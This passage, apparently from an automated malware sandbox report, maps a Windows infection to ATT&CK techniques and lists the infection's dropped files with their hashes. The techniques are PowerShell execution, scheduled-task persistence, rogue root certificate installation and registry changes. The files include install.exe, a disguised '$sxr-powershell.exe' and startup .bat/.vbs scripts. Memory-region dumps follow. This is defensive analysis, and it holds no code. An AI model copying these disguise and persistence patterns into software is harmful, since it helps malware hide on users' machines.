                                                                                                                                C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4864
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:1036
                                                                                                                                  • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                    C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:2164

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                  Execution

                                                                                                                                  Command and Scripting Interpreter

                                                                                                                                  1
                                                                                                                                  T1059

                                                                                                                                  PowerShell

                                                                                                                                  1
                                                                                                                                  T1059.001

                                                                                                                                  Scheduled Task/Job

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Persistence

                                                                                                                                  Scheduled Task/Job

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Privilege Escalation

                                                                                                                                  Scheduled Task/Job

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Defense Evasion

                                                                                                                                  Subvert Trust Controls

                                                                                                                                  1
                                                                                                                                  T1553

                                                                                                                                  Install Root Certificate

                                                                                                                                  1
                                                                                                                                  T1553.004

                                                                                                                                  Modify Registry

                                                                                                                                  1
                                                                                                                                  T1112

                                                                                                                                  Discovery

                                                                                                                                  Query Registry

                                                                                                                                  6
                                                                                                                                  T1012

                                                                                                                                  System Information Discovery

                                                                                                                                  6
                                                                                                                                  T1082

                                                                                                                                  Peripheral Device Discovery

                                                                                                                                  1
                                                                                                                                  T1120

                                                                                                                                  Command and Control

                                                                                                                                  Web Service

                                                                                                                                  1
                                                                                                                                  T1102

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    55d32bc1c206428fe659912b361362de

                                                                                                                                    SHA1

                                                                                                                                    7056271e5cf73b03bafc4e616a0bc5a4cffc810f

                                                                                                                                    SHA256

                                                                                                                                    37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff

                                                                                                                                    SHA512

                                                                                                                                    2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                    Filesize

                                                                                                                                    17KB

                                                                                                                                    MD5

                                                                                                                                    7eaeaf6bfd54799a8c15b2cf0c6f6683

                                                                                                                                    SHA1

                                                                                                                                    4238058d1ef94e3ce9bb0a6133ccd16fa7df390b

                                                                                                                                    SHA256

                                                                                                                                    4f7ae38acd9e5de90f0ce83486e3d6804e570c3b750838c42c9872b56e11f503

                                                                                                                                    SHA512

                                                                                                                                    07ee6c01404a945b5285984f4b73046325b2031b6d8632ce68d4dee0ff14e9bfd1a19268f4de5816316119a5c53944fbad103f1288eb6b4ef94425831e9b3c3c

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ghqdu34h.luu.ps1
                                                                                                                                    Filesize

                                                                                                                                    60B

                                                                                                                                    MD5

                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                    SHA1

                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                    SHA256

                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                    SHA512

                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                                    Filesize

                                                                                                                                    162KB

                                                                                                                                    MD5

                                                                                                                                    152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                                    SHA1

                                                                                                                                    c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                                    SHA256

                                                                                                                                    a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                                    SHA512

                                                                                                                                    2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
                                                                                                                                    Filesize

                                                                                                                                    423KB

                                                                                                                                    MD5

                                                                                                                                    c32ca4acfcc635ec1ea6ed8a34df5fac

                                                                                                                                    SHA1

                                                                                                                                    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

                                                                                                                                    SHA256

                                                                                                                                    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

                                                                                                                                    SHA512

                                                                                                                                    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\startup_str_989.bat
                                                                                                                                    Filesize

                                                                                                                                    515KB

                                                                                                                                    MD5

                                                                                                                                    4c2a3be3d5c9464eb441677e41f44fd8

                                                                                                                                    SHA1

                                                                                                                                    c826034a0882d21a39056d745e88622ee9698343

                                                                                                                                    SHA256

                                                                                                                                    45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

                                                                                                                                    SHA512

                                                                                                                                    ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\startup_str_989.vbs
                                                                                                                                    Filesize

                                                                                                                                    115B

                                                                                                                                    MD5

                                                                                                                                    0b3bda6ffdd71ff9dd00514a34179cf6

                                                                                                                                    SHA1

                                                                                                                                    565b45f04f7479f230a9996678243aaef3100664

                                                                                                                                    SHA256

                                                                                                                                    9a59ab294ccbce72f42c2c00d73c96ca5659d1296e0e96bb60adca192664c6ad

                                                                                                                                    SHA512

                                                                                                                                    4bf8d9cb3d6317bdec522f0609b24dc8750b0aad258990c779cfb311e8d0a3bb462b2306bbf6a2bd89ac6aaa4f13dfd51c811e2495d7548e94223a21a265420a

                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                    SHA1

                                                                                                                                    98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                    SHA256

                                                                                                                                    ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                    SHA512

                                                                                                                                    c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    f313c5b4f95605026428425586317353

                                                                                                                                    SHA1

                                                                                                                                    06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                    SHA256

                                                                                                                                    129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                    SHA512

                                                                                                                                    b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                    SHA1

                                                                                                                                    a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                    SHA256

                                                                                                                                    98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                    SHA512

                                                                                                                                    1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                    SHA1

                                                                                                                                    63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                    SHA256

                                                                                                                                    727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                    SHA512

                                                                                                                                    f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                    SHA1

                                                                                                                                    5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                    SHA256

                                                                                                                                    55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                    SHA512

                                                                                                                                    5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                    SHA1

                                                                                                                                    9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                    SHA256

                                                                                                                                    a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                    SHA512

                                                                                                                                    c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                  • \??\PIPE\srvsvc
                                                                                                                                    MD5

                                                                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                    SHA1

                                                                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                    SHA256

                                                                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                    SHA512

                                                                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                  • memory/316-171-0x000001EC4B440000-0x000001EC4B46B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/316-172-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/316-165-0x000001EC4B440000-0x000001EC4B46B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/388-176-0x0000022E61060000-0x0000022E6108B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/548-102-0x0000000007330000-0x00000000073A6000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    472KB

                                                                                                                                  • memory/548-97-0x0000000007140000-0x0000000007184000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    272KB

                                                                                                                                  • memory/608-138-0x00000220B0110000-0x00000220B013B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/608-131-0x00000220B0110000-0x00000220B013B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/608-130-0x00000220B00E0000-0x00000220B0105000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    148KB

                                                                                                                                  • memory/608-139-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/608-132-0x00000220B0110000-0x00000220B013B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/664-150-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/664-149-0x0000026203F40000-0x0000026203F6B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/664-143-0x0000026203F40000-0x0000026203F6B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/948-161-0x00007FF9380D0000-0x00007FF9380E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/948-154-0x0000028FD3800000-0x0000028FD382B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/948-160-0x0000028FD3800000-0x0000028FD382B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/2028-116-0x00007FF977DA0000-0x00007FF977E5E000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    760KB

                                                                                                                                  • memory/2028-115-0x00007FF978050000-0x00007FF978245000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    2.0MB

                                                                                                                                  • memory/2028-104-0x00000204D5400000-0x00000204D5422000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                  • memory/2028-114-0x00000204D5550000-0x00000204D557A000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                  • memory/2572-19-0x00000000060A0000-0x00000000060EC000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    304KB

                                                                                                                                  • memory/2572-5-0x00000000051A0000-0x00000000051C2000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                  • memory/2572-21-0x00000000071E0000-0x00000000071FA000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    104KB

                                                                                                                                  • memory/2572-81-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/2572-22-0x0000000002A80000-0x0000000002A88000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/2572-18-0x0000000006050000-0x000000000606E000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    120KB

                                                                                                                                  • memory/2572-17-0x0000000005C90000-0x0000000005FE4000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    3.3MB

                                                                                                                                  • memory/2572-7-0x0000000005B10000-0x0000000005B76000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    408KB

                                                                                                                                  • memory/2572-6-0x00000000059F0000-0x0000000005A56000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    408KB

                                                                                                                                  • memory/2572-20-0x0000000007820000-0x0000000007E9A000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    6.5MB

                                                                                                                                  • memory/2572-23-0x0000000007270000-0x00000000072D2000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    392KB

                                                                                                                                  • memory/2572-24-0x0000000009450000-0x00000000099F4000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    5.6MB

                                                                                                                                  • memory/2572-0-0x00000000744BE000-0x00000000744BF000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2572-4-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/2572-3-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/2572-2-0x0000000005350000-0x0000000005978000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    6.2MB

                                                                                                                                  • memory/2572-1-0x0000000004B80000-0x0000000004BB6000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    216KB

                                                                                                                                  • memory/3384-37-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/3384-50-0x0000000006CE0000-0x0000000006CFE000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    120KB

                                                                                                                                  • memory/3384-26-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/3384-36-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/3384-38-0x0000000006D00000-0x0000000006D32000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    200KB

                                                                                                                                  • memory/3384-51-0x0000000006D50000-0x0000000006DF3000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    652KB

                                                                                                                                  • memory/3384-52-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/3384-49-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/3384-39-0x00000000702D0000-0x000000007031C000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    304KB

                                                                                                                                  • memory/3384-53-0x0000000006F10000-0x0000000006F1A000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                  • memory/3384-59-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/3384-56-0x00000000744B0000-0x0000000074C60000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/3384-55-0x00000000070B0000-0x00000000070C1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    68KB

                                                                                                                                  • memory/3384-54-0x0000000007140000-0x00000000071D6000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    600KB

                                                                                                                                  • memory/3964-79-0x0000000006E80000-0x0000000006EEC000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    432KB

                                                                                                                                  • memory/3964-80-0x0000000006FB0000-0x0000000007042000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    584KB

                                                                                                                                  • memory/3964-82-0x0000000004930000-0x0000000004942000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    72KB

                                                                                                                                  • memory/3964-83-0x0000000007250000-0x000000000728C000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    240KB

                                                                                                                                  • memory/3984-119-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/3984-117-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/3984-118-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/3984-120-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/3984-126-0x00007FF977DA0000-0x00007FF977E5E000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    760KB

                                                                                                                                  • memory/3984-125-0x00007FF978050000-0x00007FF978245000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    2.0MB

                                                                                                                                  • memory/3984-122-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/3984-127-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB